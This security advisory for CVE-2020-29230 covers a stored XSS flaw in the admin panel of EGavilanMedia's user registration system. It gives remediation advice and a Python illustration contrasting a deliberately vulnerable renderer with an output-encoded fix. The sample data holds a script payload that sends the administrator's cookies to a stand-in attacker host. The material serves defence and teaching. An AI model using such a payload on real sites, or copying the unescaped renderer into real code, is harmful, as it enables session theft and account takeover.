PT-2020-17113 · Egavilanmedia · Egavilanmedia User Registration/Login System With Admin Panel

Credit: Hemant Patidar (+1)

Published: 2020-12-30 · Updated: 2021-01-04

CVE: CVE-2020-29230

CVSS v3.1: 6.1 (Medium)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: EGavilanMedia User Registration and Login System With Admin Panel, version 1.0

Description: Stored cross-site scripting (XSS) in the Admin Panel, specifically in the Manage User tab. The Full Name entered during user registration is stored and later rendered in the Manage User listing without output encoding, so an attacker can register an account whose Full Name contains an XSS payload. When an administrator opens the Manage User tab, the payload executes in the administrator's browser within the admin session; depending on the crafted payload, this lets the attacker steal the administrator's cookies (where the session cookie is not marked HttpOnly) or otherwise act with the administrator's privileges.

Recommendations: At the time of writing there is no information about a newer version that contains a fix for this vulnerability. For EGavilanMedia User Registration and Login System With Admin Panel version 1.0, HTML-encode the Full Name (and every other user-supplied field) wherever it is output in the Admin Panel, since output encoding, not input filtering, is what prevents stored XSS; as defense in depth, restrict the Full Name field in the User Registration section to an allow-list of expected characters, and set the HttpOnly flag on the session cookie so a script cannot read it through document.cookie. Until a fix is applied, avoid opening the Manage User tab with a privileged session.
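The following is an added illustration, not code from the EGavilanMedia project (the page does not state the project's language, so Python stands in for the server-side templating). It shows the flaw pattern the advisory describes, a Manage User table that concatenates the stored Full Name into HTML, beside a hardened renderer that output-encodes every user-controlled value, plus an allow-list validator for the Full Name field as defense in depth. The user records and the cookie-stealing payload are constructed for the example; the advisory does not give an exact payload.

```python
import html
import re

# Constructed sample data: two registered users, the second with a Full Name
# that carries an illustrative cookie-exfiltration payload (hypothetical host).
USERS = [
    {"id": 1, "username": "alice", "full_name": "Alice Example"},
    {
        "id": 2,
        "username": "mallory",
        "full_name": '<script>new Image().src="https://attacker.example/c?"'
                     '+document.cookie</script>',
    },
]


def render_manage_users_vulnerable(users):
    """Mimics the flaw described in the advisory: user-supplied fields are
    concatenated straight into the admin page, so stored markup in Full Name
    is returned verbatim and executes in the administrator's browser."""
    rows = "".join(
        f"<tr><td>{u['id']}</td><td>{u['username']}</td><td>{u['full_name']}</td></tr>"
        for u in users
    )
    return f"<table>{rows}</table>"


def render_manage_users_fixed(users):
    """Hardened renderer: every user-controlled value is encoded for the HTML
    text context before it is placed in the page. html.escape with quote=True
    converts < > & " ' so the stored payload is displayed, not executed."""
    def esc(value):
        return html.escape(str(value), quote=True)

    rows = "".join(
        f"<tr><td>{esc(u['id'])}</td><td>{esc(u['username'])}</td>"
        f"<td>{esc(u['full_name'])}</td></tr>"
        for u in users
    )
    return f"<table>{rows}</table>"


# Defense-in-depth allow-list for the registration form's Full Name field:
# letters, digits, spaces, periods, apostrophes and hyphens, 1 to 64 characters.
# This is an assumed policy; it does not replace output encoding.
FULL_NAME_RE = re.compile(r"^[\w .'\-]{1,64}$")


def is_acceptable_full_name(name):
    """Return True only if the Full Name matches the allow-list above."""
    return FULL_NAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    print("vulnerable:", render_manage_users_vulnerable(USERS))
    print("fixed:     ", render_manage_users_fixed(USERS))
    for u in USERS:
        print(u["username"], "accepted:", is_acceptable_full_name(u["full_name"]))
```

In the hardened output the payload survives as `&lt;script&gt;...&lt;/script&gt;`, which the browser shows as text. Note that the allow-list alone is not a fix: it blocks this payload but would also have to be applied to every other stored field, whereas encoding at output protects the admin page regardless of how the data got into the database. Marking the session cookie HttpOnly stops `document.cookie` reads but does not stop a payload from issuing requests with the administrator's session, so encoding remains the primary control.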

Exploit

XSS


Weakness Enumeration

Related Identifiers: CVE-2020-29230

Affected Products: Egavilanmedia User Registration/Login System With Admin Panel